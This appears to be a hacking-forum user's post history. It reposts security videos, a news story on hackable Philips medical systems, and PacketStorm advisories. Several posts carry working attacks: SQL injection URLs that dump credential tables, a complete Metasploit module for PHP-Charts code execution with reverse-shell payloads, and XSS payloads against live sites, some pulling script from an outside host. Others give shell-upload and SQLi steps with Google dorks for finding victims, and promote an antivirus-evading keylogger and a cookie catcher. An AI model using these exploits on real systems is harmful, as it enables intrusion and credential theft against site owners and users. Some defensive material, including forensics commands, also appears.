Everything posted by Praetorian503

  1. Description: In this video I will show you how to exploit the Kioptrix Level 3 web application using SQL injection. Kioptrix is a vulnerable web application for penetration testing. In this demo I will cover how to exploit a web application using SQL injection and how to find the web admin password.

     http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6

     http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name="dev_accounts"),4,5,6

     http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(id, 0x3A, username, 0x3A, password, 0x0A) from dev_accounts),4,5,6

     http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(userid, 0x3A, username, 0x3A, password, 0x3A, usertype, 0x3A, firstname, 0x3A, lastname, 0x3A, email, 0x3A, website, 0x3A, issuperuser, 0x3A, joincode) from gallarific_users),4,5,6

     Source: Kioptrix Level 3 Notes *Spoiler Alert* http://www.securitytube.net/video/6708
  2. An ad in the toilet?! Great, tomorrow I'm getting an identical one!
  3. http://www.youtube.com/watch?v=oMa_OEdZEDY
  4. By John Leyden. Posted in Security, 18th January 2013 17:03 GMT

     Researchers have discovered security problems in management systems used to control X-ray machines and other medical devices.

     Terry McCorkle and Billy Rios of security start-up Cylance used fuzzing approaches previously applied to unearth security holes in industrial control systems to find a way into the Xper Information Management system from Philips. The tactic allowed the researchers to gain privileged user status on the medical information management system.

     "Anything on it or what's connected to it was owned, too," Rios said during a presentation at Digital Bond's annual SCADA Security Scientific Symposium (S4) conference, which took place in Miami this week.

     The attack was in part enabled by weak remote authentication supported by the system, as well as weaknesses that left it open to fuzzing - a tactic that involves throwing variable inputs at a test device until a fault condition that might be exploited occurs. The researchers obtained the kit, which had been in service at a Utah hospital, from an unnamed reseller.

     "We noticed there was a port open, and we started basic fuzzing and found a heap overflow and wrote up a quick exploit for it," Rios told SC Magazine. "The exploit runs as a privileged service, so we owned the entire box - we owned everything that it could do."

     Authentication logins, one with a username Philips and password Service01, may be hardcoded but Philips denies this.

     Philips said that the flaw exists only in an older version of Xper. It suggested that the vulnerability was in any case limited to data management features, rather than creating a mechanism for hackers to control connected medical kit.

     "Current Xper IM systems do not use this version of software," a Philips spokesman told Dark Reading. "If an Xper IM workstation is compromised by a potential vulnerability, that may affect the data management capability, but X-ray equipment continues to operate independently," he added.

     Both the US Department of Homeland Security (DHS) ICS-CERT, which normally deals with security issues involving industry control kit, and the US Food and Drug Administration (FDA) are reportedly taking an interest in the issue.

     Information security shortcomings in medical equipment and devices have hit the news before. For example, during a presentation at Black Hat 2011, Jerome Radcliffe showed how it might be possible to either remotely turn off or alter the settings on Medtronic's insulin pumps. Radcliffe, himself a diabetic, was able to hack into the pumps without triggering alerts.

     Last year Barnaby Jack, the security researcher best known for "jackpotting" an ATM live on stage at BlackHat 2010, warned that pacemakers and implanted defibrillators are vulnerable to wireless attacks.

     Source: Paging Dr Evil: Philips medical device control kit 'easily hacked' • The Register
  5. Anti-Forensics And Anti-Anti-Forensics: Attacks And Mitigating Techniques For Digital-Forensic Investigations

     Description: Digital investigations may be conducted differently by various labs (law enforcement agencies, private firms, enterprise corporations) but each lab performs similar steps when acquiring, processing, analyzing, or reporting on data. This talk will discuss techniques that criminals can use to throw wrenches into each of these steps in order to disrupt an investigation, and how they can even force evidence to be excluded from litigation. Each of these techniques can be detected early by an investigator who is aware of them, and they can be avoided if you know what to look for. Come learn about Anti-Forensic techniques, and the Anti-Anti-Forensic techniques that mitigate them.

     Michael Perklin is a Senior Investigator and has performed digital-forensic examinations on over a thousand devices. Michael is a member of the High Technology Crime Investigations Association, a professor of digital forensics at Sheridan College, and is currently writing his thesis paper on anti-forensic techniques. Twitter: @mperklin

     PDF: https://media.defcon.org/dc-20/presentations/Perklin/DEFCON-20-Perklin-AntiForensics.pdf

     Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

     Original Source: Anti-Forensics And Anti-Anti-Forensics: Attacks And Mitigating Techniques For Digital-Forensic Investigations
  6. Description: The STMicroelectronics ST19WL18P TPM die-level analysis. Companies like Atmel, Infineon and ST are pushing motherboard manufacturers to use these devices. End-users trust these devices to hold passwords and other secrets. Once more, I will show you just how insecure these devices are.

     Christopher 'Biggun' Tarnovsky owns Flylogic, Inc. and specializes in analysis of semiconductors from a security "how strong is it really" standpoint. Flylogic offers detailed reports on substrate attacks which define if a problem exists. If a problem is identified, we explain in a detailed report all aspects of how the attack was done, level of complexity and so on. This is something we believe is unique and allows the customer to then go back to the chip vendor armed with the knowledge to make them make it better (or possibly use a different part).

     Original Source: Attacking Tpm Part 2: A Look At The St19wp18 Tpm Device
  7. Description: Speaker: BOB PAN, MOBILE SECURITY RESEARCH ENGINEER, TRENDMICRO INC.

     This concept of APK file infection on Android is similar to the concept of PE file infection on Windows systems. As the performance of Android devices has increased, it's become possible to implement such a concept in Android systems. We will demonstrate how to implement this concept. In addition, we will also give a demo to show that a PoC virus can infect normal APK files in a real Android mobile phone.

     Bob Pan mainly focuses on the mobile platform security domain (including Android/iOS platforms). He likes reverse-engineering and contributes to open source. He is the owner of dex2jar (dex2jar - Tools to work with android .dex and java .class files - Google Project Hosting), which is one of the most popular tools in the Android security industry. Now he works as a Mobile Security Research Engineer at TrendMicro.

     Original Source: Apk File Infection On An Android System
  8. Description:

     PDF: https://media.defcon.org/dc-20/presentations/Kirk/DEFCON-20-Kirk-An-Inside-Look-Into-Defense-Industrial-Base.pdf
     Extra: https://media.defcon.org/dc-20/presentations/Kirk/Extras.zip

     With an ever changing threat of nation states targeting the United States and its infrastructure and insiders stealing information for public release, we must continuously evaluate the procedural and technical controls we place on our national assets. This presentation goes into brief detail on how security controls are developed, reviewed, and enforced at a national level for protection of data classified up to Top Secret and some of the major flaws in the security approach to data privacy. The purpose of this presentation is to raise awareness of substandard security practices within sensitive areas of the Federal Government and to influence change in how controls and practices are developed and maintained.

     James Kirk is a Senior Security Consultant for Rapid7, Inc. who has over 11 years of experience in various information security disciplines. James, in his previous role, has served as a Special Agent for the Department of Defense (Defense Security Service) where he conducted numerous security audits of defense contractor facilities across the United States. http://kirkjamesm.wordpress dot com
  9. Description: Hacking Demonstration Screencast for my zero-day POC-Exploit for the Wordpress File Uploader Plugin.

     Exploit: http://goo.gl/8xb0l
     Google Dork: inurl:"wp-file-uploader" - Google Search
     More information: WordPress File Uploader Plugin PHP File Upload Vulnerability with Video Demonstration | L@usch.io
     Follow me on Twitter: https://twitter.com/La_usch
     Visit my Blog: L@usch.io | No Slogan!

     Original Source: Hacking Demonstration For Wordpress File Uploader Plugin - Infect Targets With A Webshell
  10. This Metasploit module exploits a PHP code execution vulnerability in php-Charts version 1.0 which could be abused to allow users to execute arbitrary PHP code under the context of the webserver user. The 'url.php' script calls eval() with user controlled data from any HTTP GET parameter name.

      ##
      # This file is part of the Metasploit Framework and may be subject to
      # redistribution and commercial restrictions. Please see the Metasploit
      # Framework web site for more information on licensing and terms of use.
      # http://metasploit.com/framework/
      ##

      require 'msf/core'

      class Metasploit3 < Msf::Exploit::Remote
        Rank = ExcellentRanking

        include Msf::Exploit::Remote::HttpClient

        def initialize(info={})
          super(update_info(info,
            'Name'           => "PHP-Charts v1.0 PHP Code Execution Vulnerability",
            'Description'    => %q{
              This module exploits a PHP code execution vulnerability in php-Charts
              version 1.0 which could be abused to allow users to execute arbitrary
              PHP code under the context of the webserver user. The 'url.php' script
              calls eval() with user controlled data from any HTTP GET parameter name.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
              [
                'AkaStep', # Discovery and PoC
                'Brendan Coles <bcoles[at]gmail.com>' # msf exploit
              ],
            'References'     =>
              [
                ['OSVDB', '89334'],
                ['BID', '57448'],
                ['EDB', '24201']
              ],
            'Payload'        =>
              {
                'BadChars' => "\x00\x0a\x0d\x22",
                'Compat'   =>
                  {
                    'PayloadType' => 'cmd',
                    'RequiredCmd' => 'generic telnet bash netcat-e perl ruby python',
                  }
              },
            'DefaultOptions' =>
              {
                'ExitFunction' => "none"
              },
            'Platform'       => 'unix',
            'Arch'           => ARCH_CMD,
            'Targets'        =>
              [
                ['Automatic Targeting', { 'auto' => true }]
              ],
            'Privileged'     => false,
            'DisclosureDate' => "Jan 16 2013",
            'DefaultTarget'  => 0))

          register_options(
            [
              OptString.new('TARGETURI', [true, 'The path to the web application', '/php-charts_v1.0/']),
            ], self.class)
        end

        def check
          base = target_uri.path
          base << '/' if base[-1, 1] != '/'
          peer = "#{rhost}:#{rport}"
          fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
          code = Rex::Text.uri_encode(Rex::Text.encode_base64("echo #{fingerprint}"))
          rand_key_value = rand_text_alphanumeric(rand(10)+6)

          # send check
          print_status("#{peer} - Sending check")
          begin
            res = send_request_cgi({
              'method' => 'GET',
              'uri'    => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}"
            })

            if res and res.body =~ /#{fingerprint}/
              return Exploit::CheckCode::Vulnerable
            else
              return Exploit::CheckCode::Safe
            end
          rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
            print_error("#{peer} - Connection failed")
          end
          return Exploit::CheckCode::Unknown
        end

        def exploit
          base = target_uri.path
          base << '/' if base[-1, 1] != '/'
          @peer = "#{rhost}:#{rport}"
          code = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded+"&"))
          rand_key_value = rand_text_alphanumeric(rand(10)+6)

          # send payload
          print_status("#{@peer} - Sending payload (#{code.length} bytes)")
          begin
            res = send_request_cgi({
              'method' => 'GET',
              'uri'    => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}"
            })

            if res and res.code == 500
              print_good("#{@peer} - Payload sent successfully")
            else
              fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Sending payload failed")
            end
          rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
            fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
          end
        end
      end

      Source: PacketStorm
  11. The Aloaha Credential Provider Service is vulnerable to an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exists due to the improper permissions, with the 'F' flag (full) for the 'Everyone' group, for the 'AloahaCredentialProviderService.exe' binary file. The service was shipped with Aloaha PDF Saver and possibly every SmartCard Software package from Aloaha. The files are installed in the 'Wrocklage' directory which has the Everyone group assigned to it with full permissions, making every single file inside vulnerable to change by any user on the affected machine. After you replace the binary with your rootkit, on reboot you get SYSTEM privileges. Version 5.0.226 is affected.

      Aloaha Credential Provider Monitor 5.0.226 Local Privilege Escalation Vulnerability

      Vendor: Aloaha Software - Wrocklage Intermedia GmbH
      Product web page: http://www.aloaha.com
      Affected version: 5.0.226

      Summary: Aloaha Credential Provider represents one of the most dramatic changes in the Windows Vista / 7 logon screen, making it much easier to implement new user authentication scenarios that are supported by the OS. To be able to logon via Smartcard to a windows machine requires usually the machine being a member of a domain. With the Aloaha Credential Provider that is not required, the logon screen is the first thing users see when they turn on the computer.

      Desc: The Aloaha Credential Provider Service is vulnerable to an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exists due to the improper permissions, with the 'F' flag (full) for the 'Everyone' group, for the 'AloahaCredentialProviderService.exe' binary file. The service was shipped with Aloaha PDF Saver and possibly every SmartCard Software package from Aloaha. The files are installed in the 'Wrocklage' directory which has the Everyone group assigned to it with full permissions, making every single file inside vulnerable to change by any user on the affected machine. After you replace the binary with your rootkit, on reboot you get SYSTEM privileges.

      Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit/64bit

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
      @zeroscience

      Advisory ID: ZSL-2013-5124
      Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5124.php

      19.01.2013

      ---------------------------------------------------------------------------------

      C:\Program Files\Wrocklage>sc qc AloahaCPM
      [SC] QueryServiceConfig SUCCESS

      SERVICE_NAME: AloahaCPM
              TYPE               : 10  WIN32_OWN_PROCESS
              START_TYPE         : 2   AUTO_START
              ERROR_CONTROL      : 0   IGNORE
              BINARY_PATH_NAME   : "C:\Program Files\Wrocklage\AloahaCredentialProviderService.exe"
              LOAD_ORDER_GROUP   :
              TAG                : 0
              DISPLAY_NAME       : Aloaha Credential Provider Monitor
              DEPENDENCIES       :
              SERVICE_START_NAME : LocalSystem

      C:\Program Files\Wrocklage>cacls AloahaCredentialProviderService.exe
      C:\Program Files\Wrocklage\AloahaCredentialProviderService.exe NT AUTHORITY\SYSTEM:(ID)F
                                                                     Everyone:(ID)F
                                                                     BUILTIN\Administrators:(ID)F
                                                                     BUILTIN\Users:(ID)R

      C:\Program Files\Wrocklage>

      ---------------------------------------------------------------------------------

      Source: PacketStorm
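The condition this advisory describes (a service binary that runs as LocalSystem but is writable by a non-administrative principal) can be audited from the same two command outputs it quotes. The following is an added example, not part of the advisory or of any vendor tooling: the function names and the list of trusted principals are assumptions chosen for illustration, and the sample input is reconstructed from the `sc qc` and `cacls` output shown above.

```python
import re

# Constructed sample input, reconstructed from the output quoted in the advisory.
SC_QC = r'''[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: AloahaCPM
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : "C:\Program Files\Wrocklage\AloahaCredentialProviderService.exe"
        DISPLAY_NAME       : Aloaha Credential Provider Monitor
        SERVICE_START_NAME : LocalSystem
'''
CACLS = r'''C:\Program Files\Wrocklage\AloahaCredentialProviderService.exe NT AUTHORITY\SYSTEM:(ID)F
                                                               Everyone:(ID)F
                                                               BUILTIN\Administrators:(ID)F
                                                               BUILTIN\Users:(ID)R
'''

# Assumption: principals that are expected to hold write access to service binaries.
TRUSTED = {r'nt authority\system', r'builtin\administrators',
           r'nt service\trustedinstaller'}
# cacls simple rights: N(one), R(ead), W(rite), C(hange), F(ull); W/C/F allow replacement.
WRITE_RIGHTS = {'W', 'C', 'F'}
SYSTEM_ACCOUNTS = {'localsystem', r'nt authority\system'}

ACE_RE = re.compile(r'^(?P<who>.+?):(?P<flags>(?:\([A-Z]+\))*)(?P<right>[NRWCF])$')


def parse_sc_qc(text):
    """Return the 'KEY : value' fields of `sc qc` output as a dict."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r'\s*([A-Z_0-9]+)\s*:\s*(.*)$', line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def image_path(binary_path_name):
    """Extract the executable path from BINARY_PATH_NAME (quoted, or with arguments)."""
    value = binary_path_name.strip()
    if value.startswith('"'):
        return value.split('"')[1]
    m = re.match(r'(.+?\.exe)\b', value, re.IGNORECASE)
    return m.group(1) if m else value


def parse_cacls(text, path):
    """Return (principal, inheritance_flags, right) for each simple ACE in cacls output."""
    aces = []
    for line in text.splitlines():
        line = line.strip()
        # The first output line is prefixed with the file path; drop it so the
        # drive-letter colon is not mistaken for the principal/right separator.
        if path and line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if m:
            flags = re.findall(r'\(([A-Z]+)\)', m['flags'])
            aces.append((m['who'], flags, m['right']))
    return aces


def audit(sc_qc_text, cacls_text):
    """Flag ACEs that let an untrusted principal modify the service binary."""
    svc = parse_sc_qc(sc_qc_text)
    path = image_path(svc.get('BINARY_PATH_NAME', ''))
    runs_as = svc.get('SERVICE_START_NAME', '')
    findings = []
    for who, flags, right in parse_cacls(cacls_text, path):
        if right in WRITE_RIGHTS and who.lower() not in TRUSTED:
            findings.append({
                'service': svc.get('SERVICE_NAME', ''),
                'path': path,
                'runs_as': runs_as,
                'principal': who,
                'right': right,
                'inherited': 'ID' in flags,  # (ID): ACE comes from the parent directory
                'severity': 'high' if runs_as.lower() in SYSTEM_ACCOUNTS else 'medium',
            })
    return findings


if __name__ == '__main__':
    for finding in audit(SC_QC, CACLS):
        print(finding)
```

The `inherited` field matters for remediation: an `(ID)` entry comes from the parent directory, so the ACL has to be corrected on the 'Wrocklage' directory rather than on the single file.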
  12. Apache OFBiz versions 10.04.05 and below and 11.04.01 and below suffer from a reflected cross site scripting vulnerability. Full exploitation details provided.

      Title: Cross-Site Scripting (XSS) Vulnerability in Apache OFBiz
      Type: Remote
      Author: Juan Caillava (@jcaillava) / Marcos Garcia (@artsweb)
      CVE: CVE-2013-0177
      Impact: Direct execution of arbitrary code in the context of Webserver user.
      Release Date: 18.01.2013

      Summary
      =======
      Apache Open For Business (Apache OFBiz) is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise.

      Description
      ===========
      Reflected Cross-Site Scripting Vulnerability affecting Screenlet.title and Image.alt Widget attributes because the content of these two elements is not properly escaped.

      Vendor
      ======
      Apache ofbiz - http://ofbiz.apache.org/

      PoC
      ===
      It is worth mentioning that originally the resource was using the HTTP method POST, but it was changed to GET to exploit it more easily. Something important to remark is that for this attack to work, the victim should be authenticated. Below you can see how the URL is specially crafted to expose the issue:

      Affected URL: https://10.10.10.14:8443/exampleext/control/ManagePortalPages -> parameter: parentPortalPageId==[XSS]

      GET /exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE"><script>alert("xss")</script> HTTP/1.1
      Host: 10.10.10.14:8443
      User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
      Connection: keep-alive
      Referer: https://10.10.10.14:8443/exampleext/control/main?externalLoginKey=EL367731470037
      Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1; OFBiz.Visitor=10002

      Solution
      ========
      10.04.* users should upgrade to 10.04.05
      11.04.01 users should upgrade to 11.04.02

      Vendor Status
      =============
      [08.01.2013] Vulnerability discovered.
      [09.01.2013] Vendor informed.
      [09.01.2013] Vendor replied.
      [12.01.2013] Vendor reveals patch release date.
      [18.01.2013] Public advisory.

      Source: PacketStorm
  13. Adobe Experience suffers from a reflected cross site scripting vulnerability. The author contacted Adobe back in August but the issue is still not resolved so they are releasing details in hopes that Adobe will address the issue. Note that this finding houses site-specific data.

      Title       : Adobe Experience Delivers reflected Cross-site Scripting (XSS) vulnerability
      Vendor      : Adobe Systems Incorporated (http://www.adobe.com)
      Description : experiencedelivers.adobe.com is vulnerable to reflected Cross-site Scripting attacks

      Advisory time-line:
      ----------------------------------------------------------------------------------------------------
      - Vendor PSIRT notified  : 05-Aug-2012
      - Vendor response        : 05-Aug-2012. Ticket created. "Looking into it now".
      - Status requests        : 09-Sep-2012, 01-Nov-2012, 08-Nov-2012, 13-Nov-2012, 31-Dec-2012
                                 Adobe PSIRT has not responded to any requests after 09-Nov-2012
      - Packet Storm advisory  : 19-Jan-2013

      Test environment
      ----------------------------------------------------------------------------------------------------
      - Latest Firefox browser

      Details
      ----------------------------------------------------------------------------------------------------
      Affected functionality: search function

      Test #1: Remote Javascript execution: display browser cookie
      http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E&blog=search&_charset_=UTF-8

      Test #2, Remote Javascript execution: overwrite HTML content - PoC
      http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Fae00.js%3E%3C%2Fscript%3E&blog=search&_charset_=UTF-8

      Test #3, Alert test with image-tag
      http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&blog=search&_charset_=UTF-8

      Note: the Javascript test cases are not malicious.

      Researcher
      ----------------------------------------------------------------------------------------------------
      Janne Ahlberg
      Twitter: https://twitter.com/JanneFI
      Blog: http://janne.is
      Project site: http://idash.net

      Source: PacketStorm
  14. The WordPress Ripe HD FLV player plugin suffers from path disclosure and remote SQL injection vulnerabilities.

      -------------------------------------------------------------------
      Wordpress plugins - ripe-hd-player FD/SQL Injection Vulnerability
      -------------------------------------------------------------------
      # Vendor: http://www.hitasoft.com/products.php
      #####
      # Author => Zikou-16
      # E-mail => zikou16x@gmail.com
      # Facebook => http://fb.me/Zikou.se
      # Google Dork => inurl:"/wp-content/plugins/ripe-hd-player/"
      # Tested on : Windows 7 , Backtrack 5r3
      ####

      #=> Exploit Info :
      ------------------
      # The attacker can access to the database & get username & password ....... & disclosure the Full Path
      ------------------

      #=> Exploit :
      ------------------
      1#=> Full Path Disclosure :
      http://[target]/[path]/wp-content/plugins/ripe-hd-player/index.php
      http://[target]/[path]/wp-content/plugins/ripe-hd-player/installer.php
      -------
      2#=> SQL Injection
      http://[target]/[path]/wp-content/plugins/ripe-hd-player/config.php?id=2'[inj3ct h3re]
      ------------------------------
      <= Th3 End '

      Source: PacketStorm
  15. The Joomla Collector component suffers from a remote shell upload vulnerability.

      # Exploit Title: Joomla com_collecter shell upload
      # Author: Red Dragon_al (Alb0zZ Team)
      # Home: HackForums.AL, alb0zz.in
      # Date: 19/01/2013
      # Category: web apps
      # Google dork: [inurl:index.php?option=com_collector]
      # Tested on: Windows XP
      # Download: http://www.steevo.fr/en/download
      # Home Page: http://www.steevo.fr/

      ---------------------------------------
      # ~ Expl0itation ~ #
      ---------------------------------------
      1- Google dork: [inurl:index.php?option=com_collector]
      2- add this part to the site
         /index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
      3- it will look like this
         http://www.site.com/[path]//index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
         upload ur shell as : shell.php

      # Greetz : R-t33n , dA3m0n , 0x0 , The0c_No , AutoRun , Dr.Sql , Danzel , RetnOHacK , eragon , gForce , Th3_Power , AHG-CR3W , & All my friends.
      #2013

      Source: PacketStorm
  16. Classified Ultra ScriptsGenie suffers from cross site scripting and remote SQL injection vulnerabilities. Note that this finding houses site-specific data.

      # Exploit Title; Classified Ultra ScriptsGenie Multiple Vulnerabilities
      # Date; 20/1/13
      # Author; 3spi0n
      # Script Vendor or Software Link; http://www.hotscripts.com/listing/classified-ultra-scriptsgenie/
      # Category; Webapps
      # Type; SQL Injection [MySQLi]
      # Tested on; Ubuntu 12.10 / Win7 / Backtrack 5

      [#] Demo Analyzing ;
      # http://resalemembership.com/demos/classifiedultra/nclass.php [Official Demo]

      [#] Vulnerable Analyzing ;

      [-] SQL Injection
      # http://resalemembership.com/demos/classifiedultra/subclass.php?c=16' [SQLi HERE]

      [...] Analyzing
      Selected Column Count is 4
      Valid String Column is 3
      Current DB: resalem1_ultra
      ...
      Tables found: Site_Admin,clientsignup,contact,o_ads,o_categories,o_catimages,o_subcategories
      [Using "Site_Admin"]
      ...
      Columns found: id,admin,passme
      ...
      Data Found: admin=admin
      Data Found: passme=pass

      [-] XSS
      # http://resalemembership.com/demos/classifiedultra/subclass.php?c=6&cname=Credit%20Cards[XSS HERE]

      [...] Analyzing
      # http://resalemembership.com/demos/classifiedultra/subclass.php?c=6&cname= <script>alert('3spi0n')</script>
      # http://resalemembership.com/demos/classifiedultra/subclass.php?c=6&cname=<IFRAME SRC="javascript:alert('3spi0n');"></IFRAME>

      [#] Greetz ;
      - Grayhatz Inc. & Janissaries Team
      - Twitter.Com/bariiiscan
      - Facebook.Com/3spi0ne

      Source: PacketStorm
  17. Description: SecurityTube Linux Assembly Expert (SLAE) Course Introduction - For full details on taking the course, please visit SecurityTube Linux Assembly Expert Source: http://www.securitytube.net/video/6707
  18. Welcome. Finally an introduction that I enjoyed reading.
  19. OFF: Write yourself a proper introduction too, in which you specify a few things. E.g.: knowledge, connections, contacts, etc. ON: Welcome!
  20. Description: This short tutorial shows you how to create a simple cookie catcher when cross-site scripting (XSS) and unsecure cookies exist on a web application. Penetration testers can use this to show clients how easy it is to grab cookies from a web application if it is vulnerable to cross-site scripting.

      Cookie Catcher Script: Cookie Catcher PHP Script - Pastebin.com

      Original Source: Xss Cookie Catcher Tutorial
  21. Description: Xenotix KeylogX is a Keylogger add-on for Mozilla Firefox. www.kerlacyberforce.in

      Features
      - Bypass Key Scrambler
      - Bypass Virtual Keyboard
      - Undetectable by Anti-Virus

      USAGE
      Install, set a password.
      To view the logs: ALT+SHIFT+\

      Original Source: Xenotix Local Keylogger For Firefox V3
  22. Description: In this video I will show you how to crack a WEP key using Wifite. This tool is very easy to use and very powerful: if one attack method doesn't work, it will start working on the next attack, and the best thing is that this tool is fully automatic and powerful.

      Original Source: Automated Way To Crack Wep Using Wifite
  23. Description: In this video I will show you how to use the Volatility Framework for some basic information gathering from memory. I will show you how to identify the image and how to dump a suspect file.

      Commands:

      ./vol.py -f stuxnet.vmem --profile=WinXPSP3x86 imageinfo
          Image Identification
      ./vol.py -f stuxnet.vmem --profile=WinXPSP3x86 kpcrscan
          Image Identification
      ./vol.py -f stuxnet.vmem --profile=WinXPSP3x86 kdbgscan
          Image Identification
      ./vol.py -f stuxnet.vmem --profile=WinXPSP3x86 pslist
          To list the processes of a system
      ./vol.py -f stuxnet.vmem --profile=WinXPSP3x86 pstree
          To view the process listing in tree form, use the pstree command
      ./vol.py -f stuxnet.vmem --profile=WinXPSP3x86 psscan
          To enumerate processes using pool tag scanning
      ./vol.py -f stuxnet.vmem --profile=WinXPSP3x86 dlllist
          To display a process's loaded DLLs
      ./vol.py -f stuxnet.vmem --profile=WinXPSP3x86 dlllist --pid=492
          To extract a DLL from a process's memory space and dump it to disk for analysis
      ./vol.py -f stuxnet.vmem --profile=WinXPSP3x86 dlldump -r kernel32 -D out
          To extract a DLL from a process's memory space and dump it to disk for analysis
      ./vol.py -f stuxnet.vmem --profile=WinXPSP3x86 handles
          To display the open handles in a process, use the handles command.
      ./vol.py -f stuxnet.vmem --profile=WinXPSP3x86 handles -p 4 -t Key
          To display the open handles in a process, use the handles command.
      ./vol.py -f stuxnet.vmem --profile=WinXPSP3x86 getsids
          To view the SIDs (Security Identifiers) associated with a process

      CommandReference - volatility - Example usage cases and output for Volatility 2.0 commands - An advanced memory forensics framework - Google Project Hosting

      Original Source: Volatility Image Identification And Processes And Dlls Usage
  24. Welcome! But why did you write so big?